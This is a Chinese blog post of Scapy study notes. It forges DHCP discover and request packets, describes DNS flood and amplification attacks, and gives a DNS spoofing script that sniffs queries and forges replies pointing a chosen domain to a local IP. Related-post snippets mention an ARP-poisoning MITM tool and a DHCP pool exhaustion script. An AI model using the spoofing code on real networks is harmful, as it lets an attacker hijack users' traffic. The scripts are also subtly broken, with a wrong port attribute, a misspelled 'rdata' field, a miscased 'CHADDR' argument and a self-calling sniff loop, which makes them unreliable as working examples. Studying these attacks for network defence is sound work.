Scapy技术笔记(二)

已于 2023-03-31 21:36:50 修改
阅读量367 收藏 1
点赞数
文章标签: 网络 服务器 tcp/ip
于 2023-03-31 21:04:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63565161/article/details/129888491
版权

Scapy的简单使用

python模拟DHCP客户端

DHCP原理

我们需要发送两个包,第一个发一个广播说我需要一个ip。等待DHCP服务器回应。

构造的数据包需要有五个协议。Ether, IP, UDP, BOOTP DHCP

其中关于BOOTP的属性如下:BOOTP是DHCP的引导协议。

关于BOOTP协议包里面的属性:

op : ByteEnumField = ('1') 操作类型

htype : ByteEnumField = ('1') 硬件地址类型

hlen : ByteField = ('6') 硬件地址长度

hops : ByteField = ('0') 跳数

xid : XIntField = ('0') 事务id(记录一次请求过程)

secs : ShortField = ('0') 经过时间

flags : FlagsField = ('<Flag 0 ()>') BOOTP标志位

ciaddr : IPField = ("'0.0.0.0'") DHCP客户端IP

yiaddr : IPField = ("'0.0.0.0'") DHCP分配的IP

siaddr : IPField = ("'0.0.0.0'") 其他DHCP的分的IP

giaddr : IPField = ("'0.0.0.0'") 转发代理IP

chaddr : _BOOTP_chaddr = ("b''") 自己MAC地址

sname : StrFixedLenField = ("b''") 服务器名称

file : StrFixedLenField = ("b''") 指定的配置文件名称

options : StrEnumField = ("b''") 可选选项

None

DHCP模拟发送请求

import random

from scapy.all import *
import binascii

from scapy.layers.dhcp import BOOTP, DHCP
from scapy.layers.inet import IP, UDP
from scapy.layers.l2 import Ether


xid_random = random.randint(1,900000000)
mac_random = str(RandMAC())
client_mac_id = binascii.unhexlify(mac_random.replace(':',''))
print(mac_random)
dhcp_discover = Ether(src=mac_random,dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0",dst="255.255.255.255") / UDP(sport=68,dport=67) / BOOTP(chaddr=client_mac_id,xid=xid_random) / DHCP(options=[("message-type","discover"),"end"])

sendp(dhcp_discover,iface="WLAN")

print("\n\n\nSending DHCPDISCOVER on:"+"WLAN")

这里我遇到了点问题,发送的广播一直得不到回应。书上用sendp函数都能收到dhcp服务器的回应dhcp offer。我这里换成sr函数后还是没有回应。

from scapy.all import *
from scapy.layers.dhcp import DHCP, BOOTP
from scapy.layers.inet import UDP, IP
from scapy.layers.l2 import Ether


def detect_dhcp(pkt):
    if DHCP in pkt:
        if pkt[DHCP].options[0][1]==2:
            Ether_Request = Ether(src=pkt[Ether].dst,dst="ff:ff:ff:ff:ff:ff")
            IP_Request = IP(src="0.0.0.0",dst="255.255.255.255")
            UDP_Request = UDP(sport=68,dport=67)
            BOOTP_Request = BOOTP(CHADDR=pkt[BOOTP].chaddr,xid=pkt[BOOTP].xid)
            DHCP_Request = DHCP(options=[("message-type","request"),("server_id",pkt[DHCP].options[1][1]),("requested_addr",pkt[BOOTP].yiaddr),"end"])

            Request = Ether_Request / IP_Request / UDP_Request / BOOTP_Request / DHCP_Request

            sendp(Request,iface="WLAN")
            print(pkt[BOOTP].yiaddr+"正在分配")
        if pkt[DHCP].options[0][1] == 5:
            print(pkt[BOOTP].yiaddr+"已经分配")

sniff(filter="src port 67",iface="WLAN",prn=detect_dhcp,count=10)

简单来说,dhcp就是本机在只有MAC地址的情况下,向DHCP服务器请求IP的一个过程。hacker在网络中常常会建造伪装的DHCP服务器的方式来进行钓鱼。

DNS协议

概念解释

DNS泛洪攻击:感觉有点类似DDOS,都是向DNS服务器发送大量请求导致网速变慢或者无法访问

DNS放大攻击:DNS的应答数据包要比请求包大的多,hacker可伪造受害者ip发送DNS请求,从而影响受害者。

DNS服务端组织架构:

DNS欺骗

from scapy.all import *
from scapy.layers.dns import DNS, DNSRR
from scapy.layers.inet import UDP, IP


def dns_spoof(pkt):
    testlist=["www.namp.org"]
    if pkt.haslayer(DNS) and pkt.getlayer(DNS).qr == 0:           #haslayer判断数据包是否包含某一协议内容 getlayer用来提取该协议内容
        ip = pkt.getlayer(IP)
        udp = pkt.getlayer(UDP)
        dns = pkt.getlayer(DNS)
        testdomain = dns.qd.qname.decode()[:-1]
        if testdomain in testlist:
            resp = IP(src=ip.dst,dst=ip.src)
            resp /= UDP(sport=udp.dport,dport=udp.port)
            resp /= DNS(id=dns.id,qr=1,qd=dns.qd,an=DNSRR(rrname=dns.qd.qname,radta="192.168.1.1"))

            send(resp)
            print("DNS的应答被篡改")

    sniff(filter="udp dst port 53",iface="WLAN",prn=dns_spoof())
clown_0x00
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mitm:一个简单而有效的python3脚本,用于通过ARP中毒执行DNS欺骗
05-23
mitm 一个简单而有效的python3脚本,用于通过ARP中毒执行DNS欺骗 安装 adam@paradise:~ $ git clone https://github.com/blackeko/mitm/ adam@paradise:~ $ cd mitm adam@paradise:~ $ pip3 install -r requirements.txt adam@paradise:~ $ sudo python3 mitm.py 演示版 结果 各种各样的 企业数字基础设施项目
Scapy网络数据包修改工具
07-25
该工具基于Scapy,用于创建EDIG和修改网络数据包(IT和OT),如IP、UDP、TCP、HTTP、RIP、ICMP、Modubs、Profinet等。
bootp引导程序协议
陌上花开缓缓归以的博客
05-12 1058
IP数据报我们前面有了解过,这里不赘述了,整个报文结构如下 ,前面还有个以太网首部,即是。tftp协议后续再介绍,现在我们先来了解一下bootp.mac首部+ ip首部+udp首部 + udp报文。3,bootp的报文了解.请求和应答均被封装在。
耗尽dhcp地址池的一个python脚本
hiker0x0的专栏
04-01 6917
最近在backtrack下看到一款dhcp地址池耗尽攻击的工具,用python的scapy模块写的,经测试效果很好 #! /usr/bin/env python # -*- coding: utf-8 -*- """ DHCP exhaustion attack plus. Usage: pig.py [-d -h] """ from scapy.all import * import
Python实现DHCP请求
m0_63853512的博客
04-08 3335
Scapy 模拟DHCP
Scapy常用操作和命令(1)
Han的小站
01-22 7077
 ls()    列出scapy中实现的所有网络协议 >>> ls() ARP        : ARP ASN1_Packet : None BOOTP      : BOOTP CookedLinux : cooked linux DHCP       : DHCP options DHCP6      : DHCPv6 Generic Mes
scapy抓包windows_scapy在windows下抓取不到WLAN的包?
weixin_36255898的博客
02-22 473
win支持度不好,sr貌似是不能用,只有在linux下可以,其它函数是可以的如何抓取vlan,参考:python - Why isn't scapy capturing VLAN tag information?结果如下:>>> conf.use_pcap = True #步骤1>>> import scapy.arch...
python绝技 — 用Scapy测试无线网卡的嗅探功能
abg49988的博客
11-23 425
代码 #!/usr/bin/python #--*--coding=utf-8--*-- from scapy.all import * def pktPrint(pkt): if pkt.haslayer(Dot11Beacon): print '[+] Detected 802.11 Beacon Frame' elif pkt.haslayer(...
Python-DHCP(scapy应用)
qingguaxiaoxiao的博客
06-12 893
DHCP Client ---->dhcp request(发送选择好的ip) DHCPServer。DHCP Client ---->dhcp discover(请求分配ip) DHCPServer。DHCP Client <----dhcp offer(发送ip池) DHCPServer。该网址下载Winpacp即可。
python3scapy库函数使用,发送数据包
Flynn的博客
09-27 2975
scapy函数 交互式网络分组处理模块。可以用于构造或者解码大量的数据包协议,发送,捕获数据包并匹配请求和回复。 导入scapy库 from scapy.all import * 构造数据包 简单构造 直接构造默认数据包 >>> a=IP() #不带参数表示构造默认的IP数据包 >>> a.show() #查看数据包a的相关信息 ###[ IP ]### version = 4 ihl = None tos = 0x0
Scapy中文使用文档.pdf
09-30
Scapy中文使用文档.pdf
scapy使用手册
10-09
scapy 讲解手册,可以有效的整理知识点,完整的ppt文档,不需要在总结,美观有b格!
python_scapy
03-17
Python 3 Scapy库 重要的 该代码的作者对您的使用或滥用不承担任何责任! 表中的内容
python scapy
11-15
scapy compatibility.py 177行出错。用这个包可以解决。删除C:\Python27\Lib\site-packages\scapy目录下所有文件。解压zip包中文件,运行命令 python setup.py install
基于python的耗尽DHCP地址池攻击脚本分析
lijihao_10086的博客
01-13 2109
简介: 之前在博客上有浏览到其他大神写的耗尽DHCP地址池的攻击脚本,但是没有具体的解析,这里将简单介绍整个脚本的思路,和具体代码分析。 本人代码能力有限,有不足和错误之处,还希望多多指点,欢迎交流 话不多说,上代码啦啦啦啦啦啦啦() 脚本思路: 1.线程1----sniff_dhcp: 过滤抓取DHCP Offer报文,分析Offer报文字段,提取DHCP服务器回应的Offer信息。并根据提取的...
scapy学习(一)
LshuangCC的博客
06-23 1317
scapy像一把瑞士军刀一样,可以用过网络分析的多种场景,主要用于网络报文分析、捕获及自定义协议报文等。 我们可以通过命令行或是python脚本两种方式来使用scapyscapy的安装知道参考:https://scapy.readthedocs.io/en/latest/ 1. scapy命令: ls(): 列出scapy所支持的所有协议 >>> ls() AH : AH AKMSuite : AKM suite ARP : ARP ASN
Python 实现ARP与DNS欺骗
CSDN
05-28 5312
Scapy是一个Python编写的强大网络数据包处理库,它提供了创建、发送、解析和操作网络数据包的功能。Scapy允许开发人员以编程方式构建各种类型的网络工具和应用,包括网络扫描、协议分析、网络攻击和防御等。
scapy库haslayer的用法
weixin_35756130的博客
02-01 906
Scapy库中的haslayer方法是用来判断数据包是否包含指定的协议层的。它的用法是在Scapy的数据包对象上调用haslayer方法,并传入想要判断的协议层的类型,如果该数据包包含这一层,那么返回True,否则返回False。例如: >>> packet = IP(dst="www.google.com")/TCP() >>> if packet.hasla...
python scapy 发送层报文
最新发布
07-29
回答: 要使用Python的Scapy库发送层报文,你需要按照以下步骤进行操作。首先,你需要安装Scapy库,可以使用pip命令进行安装,例如:pip install scapy。\[3\]接下来,你需要引入Scapy库,可以使用以下代码进行引入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值